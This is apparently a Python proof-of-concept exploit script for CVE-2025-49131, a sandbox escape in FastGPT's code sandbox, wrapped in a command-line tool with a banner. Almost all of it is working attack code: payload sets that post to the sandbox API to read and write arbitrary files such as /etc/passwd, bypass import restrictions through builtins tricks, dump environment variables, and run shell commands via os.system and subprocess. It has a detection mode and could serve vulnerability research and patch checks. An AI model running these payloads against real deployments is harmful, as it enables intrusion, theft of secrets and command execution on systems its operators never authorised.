#!/usr/bin/env python3 """ CVE-2025-49131 - FastGPT Sandbox Escape Proof of Concept ======================================================== Vulnerability: Sandbox Escape via insufficient isolation Affected: FastGPT fastgpt-sandbox < 4.9.11 CVSS: 6.3 (Medium) Impact: Read/Write arbitrary files, bypass Python import restrictions Author: Security Research Date: 2025-12-30 """ import argparse import requests import json import base64 import sys from typing import Optional, Dict, Any # Colors for output class Colors: RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' BLUE = '\033[94m' PURPLE = '\033[95m' CYAN = '\033[96m' RESET = '\033[0m' BOLD = '\033[1m' def banner(): print(f"""{Colors.RED} ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗ ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝ █████╗ ███████║███████╗ ██║ ██║ ███╗██████╔╝ ██║ ██╔══╝ ██╔══██║╚════██║ ██║ ██║ ██║██╔═══╝ ██║ ██║ ██║ ██║███████║ ██║ ╚██████╔╝██║ ██║ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ {Colors.YELLOW} ███████╗ █████╗ ███╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╔════╝██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝ ███████╗███████║██╔██╗ ██║██║ ██║██████╔╝██║ ██║ ╚███╔╝ ╚════██║██╔══██║██║╚██╗██║██║ ██║██╔══██╗██║ ██║ ██╔██╗ ███████║██║ ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ {Colors.GREEN} ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗ ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝ █████╗ ███████╗██║ ███████║██████╔╝█████╗ ██╔══╝ ╚════██║██║ ██╔══██║██╔═══╝ ██╔══╝ ███████╗███████║╚██████╗██║ ██║██║ ███████╗ ╚══════╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚══════╝ {Colors.CYAN}╔═══════════════════════════════════════════════════════════╗ ║ CVE-2025-49131 | CVSS 6.3 (Medium) ║ ║ FastGPT Sandbox Container Escape ║ ║ Affected: < v4.9.11 ║ ║ Impact: File R/W, Import Bypass, Remote Code Execution ║ ╚═══════════════════════════════════════════════════════════╝{Colors.RESET} """) class FastGPTSandboxExploit: """FastGPT Sandbox Escape Exploit Class""" def __init__(self, target: str, verbose: bool = False): self.target = target.rstrip('/') self.verbose = verbose self.session = requests.Session() self.session.headers.update({ 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }) def log(self, msg: str, level: str = 'info'): """Log messages with color""" colors = { 'info': Colors.BLUE, 'success': Colors.GREEN, 'error': Colors.RED, 'warning': Colors.YELLOW } if self.verbose or level in ['success', 'error']: print(f"{colors.get(level, Colors.RESET)}[{level.upper()}]{Colors.RESET} {msg}") def check_target(self) -> bool: """Check if target is reachable""" try: resp = self.session.get(f"{self.target}/health", timeout=10) return resp.status_code == 200 except Exception as e: self.log(f"Target unreachable: {e}", 'error') return False def detect_vulnerability(self) -> Dict[str, Any]: """Non-destructive vulnerability detection""" self.log("Checking for CVE-2025-49131 vulnerability...", 'info') # Detection payload - tries to access __builtins__ detection_payloads = [ { "code": "str(type(__builtins__))", "description": "Builtins access check" }, { "code": "str(dir())", "description": "Global namespace check" } ] results = { "vulnerable": False, "version": "unknown", "details": [] } for payload in detection_payloads: try: result = self.execute_code(payload["code"]) if result and "error" not in result.lower(): results["details"].append({ "test": payload["description"], "result": "passed", "output": result[:100] }) results["vulnerable"] = True except Exception as e: results["details"].append({ "test": payload["description"], "result": "blocked", "error": str(e) }) return results def execute_code(self, code: str) -> Optional[str]: """Execute code in the sandbox""" payload = { "code": code, "variables": {} } try: resp = self.session.post( f"{self.target}/api/sandbox/run", json=payload, timeout=30 ) if resp.status_code == 200: data = resp.json() return data.get("result", data.get("output", str(data))) else: self.log(f"Request failed: {resp.status_code}", 'error') return None except Exception as e: self.log(f"Execution error: {e}", 'error') return None def read_file(self, filepath: str) -> Optional[str]: """ Read arbitrary file via sandbox escape Uses multiple bypass techniques """ self.log(f"Attempting to read: {filepath}", 'info') # Multiple file read payloads payloads = [ # Direct open f"open('{filepath}', 'r').read()", # Builtins bypass f"__builtins__.open('{filepath}').read()", # Lambda wrapper f"(lambda: open('{filepath}').read())()", # Getattr bypass f"getattr(__builtins__, 'open')('{filepath}').read()", # Code object manipulation f"exec('result=open(\"{filepath}\").read()') or result", ] for i, payload in enumerate(payloads, 1): self.log(f"Trying payload {i}/{len(payloads)}...", 'info') try: result = self.execute_code(payload) if result and "error" not in result.lower() and "traceback" not in result.lower(): self.log(f"Success with payload {i}!", 'success') return result except Exception as e: self.log(f"Payload {i} failed: {e}", 'warning') continue self.log("All file read payloads failed", 'error') return None def write_file(self, filepath: str, content: str) -> bool: """ Write arbitrary file via sandbox escape """ self.log(f"Attempting to write to: {filepath}", 'info') # Escape content for Python string escaped_content = content.replace('\\', '\\\\').replace("'", "\\'") payloads = [ f"open('{filepath}', 'w').write('{escaped_content}')", f"__builtins__.open('{filepath}', 'w').write('{escaped_content}')", ] for i, payload in enumerate(payloads, 1): try: result = self.execute_code(payload) if result: self.log(f"File write successful!", 'success') return True except Exception as e: self.log(f"Payload {i} failed: {e}", 'warning') continue self.log("All file write payloads failed", 'error') return False def import_bypass(self, module: str) -> Optional[str]: """ Bypass import restrictions """ self.log(f"Attempting to import: {module}", 'info') payloads = [ # Direct import f"__import__('{module}')", # Builtins import f"__builtins__.__import__('{module}')", # Importlib f"__import__('importlib').import_module('{module}')", # Exec import f"exec('import {module}')", # Dict access f"__builtins__.__dict__['__import__']('{module}')", ] for i, payload in enumerate(payloads, 1): try: result = self.execute_code(payload) if result and "error" not in result.lower(): self.log(f"Import bypass successful with payload {i}!", 'success') return result except Exception as e: continue self.log("All import bypass payloads failed", 'error') return None def get_env(self) -> Optional[Dict]: """Get environment variables""" self.log("Attempting to read environment variables...", 'info') payloads = [ "__import__('os').environ.copy()", "dict(__import__('os').environ)", ] for payload in payloads: try: result = self.execute_code(payload) if result: return result except: continue return None def rce_chain(self, command: str) -> Optional[str]: """ Attempt full RCE via various chains """ self.log(f"Attempting RCE chain with command: {command}", 'info') payloads = [ # os.system f"__import__('os').system('{command}')", # os.popen f"__import__('os').popen('{command}').read()", # subprocess f"__import__('subprocess').check_output('{command}', shell=True).decode()", # subprocess with Popen f"__import__('subprocess').Popen('{command}', shell=True, stdout=-1).communicate()[0].decode()", ] for i, payload in enumerate(payloads, 1): try: result = self.execute_code(payload) if result: self.log(f"RCE successful with method {i}!", 'success') return result except Exception as e: self.log(f"RCE method {i} failed: {e}", 'warning') continue self.log("All RCE payloads failed", 'error') return None def main(): banner() parser = argparse.ArgumentParser( description='CVE-2025-49131 - FastGPT Sandbox Escape POC', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python poc.py --target http://localhost:3001 --detect python poc.py --target http://localhost:3001 --read /etc/passwd python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131" python poc.py --target http://localhost:3001 --import os python poc.py --target http://localhost:3001 --rce "id" """ ) parser.add_argument('--target', '-t', required=True, help='Target FastGPT sandbox URL') parser.add_argument('--detect', '-d', action='store_true', help='Detect vulnerability (non-destructive)') parser.add_argument('--read', '-r', help='File path to read') parser.add_argument('--write', '-w', help='File path to write') parser.add_argument('--content', '-c', default='CVE-2025-49131 POC', help='Content to write') parser.add_argument('--import', '-i', dest='import_module', help='Module to import') parser.add_argument('--env', '-e', action='store_true', help='Read environment variables') parser.add_argument('--rce', help='Command to execute (RCE)') parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output') parser.add_argument('--output', '-o', help='Output file for results') args = parser.parse_args() exploit = FastGPTSandboxExploit(args.target, args.verbose) results = {"target": args.target, "cve": "CVE-2025-49131", "actions": []} if args.detect: print(f"\n{Colors.CYAN}[*] Running vulnerability detection...{Colors.RESET}") detect_result = exploit.detect_vulnerability() results["detection"] = detect_result if detect_result["vulnerable"]: print(f"{Colors.GREEN}[+] TARGET IS VULNERABLE!{Colors.RESET}") else: print(f"{Colors.YELLOW}[-] Target may be patched or not vulnerable{Colors.RESET}") print(json.dumps(detect_result, indent=2)) if args.read: print(f"\n{Colors.CYAN}[*] Reading file: {args.read}{Colors.RESET}") content = exploit.read_file(args.read) if content: print(f"{Colors.GREEN}[+] File content:{Colors.RESET}") print("-" * 50) print(content) print("-" * 50) results["actions"].append({"type": "read", "file": args.read, "success": True, "content": content[:500]}) else: results["actions"].append({"type": "read", "file": args.read, "success": False}) if args.write: print(f"\n{Colors.CYAN}[*] Writing to file: {args.write}{Colors.RESET}") success = exploit.write_file(args.write, args.content) results["actions"].append({"type": "write", "file": args.write, "success": success}) if success: print(f"{Colors.GREEN}[+] File written successfully!{Colors.RESET}") if args.import_module: print(f"\n{Colors.CYAN}[*] Attempting import bypass: {args.import_module}{Colors.RESET}") result = exploit.import_bypass(args.import_module) results["actions"].append({"type": "import", "module": args.import_module, "success": bool(result)}) if result: print(f"{Colors.GREEN}[+] Import bypass successful: {result}{Colors.RESET}") if args.env: print(f"\n{Colors.CYAN}[*] Reading environment variables...{Colors.RESET}") env = exploit.get_env() if env: print(f"{Colors.GREEN}[+] Environment:{Colors.RESET}") print(env) results["actions"].append({"type": "env", "success": True}) if args.rce: print(f"\n{Colors.CYAN}[*] Attempting RCE: {args.rce}{Colors.RESET}") output = exploit.rce_chain(args.rce) if output: print(f"{Colors.GREEN}[+] Command output:{Colors.RESET}") print("-" * 50) print(output) print("-" * 50) results["actions"].append({"type": "rce", "command": args.rce, "success": True, "output": output}) else: results["actions"].append({"type": "rce", "command": args.rce, "success": False}) if args.output: with open(args.output, 'w') as f: json.dump(results, f, indent=2) print(f"\n{Colors.GREEN}[+] Results saved to: {args.output}{Colors.RESET}") print(f"\n{Colors.PURPLE}[*] Exploit completed.{Colors.RESET}") if __name__ == "__main__": main()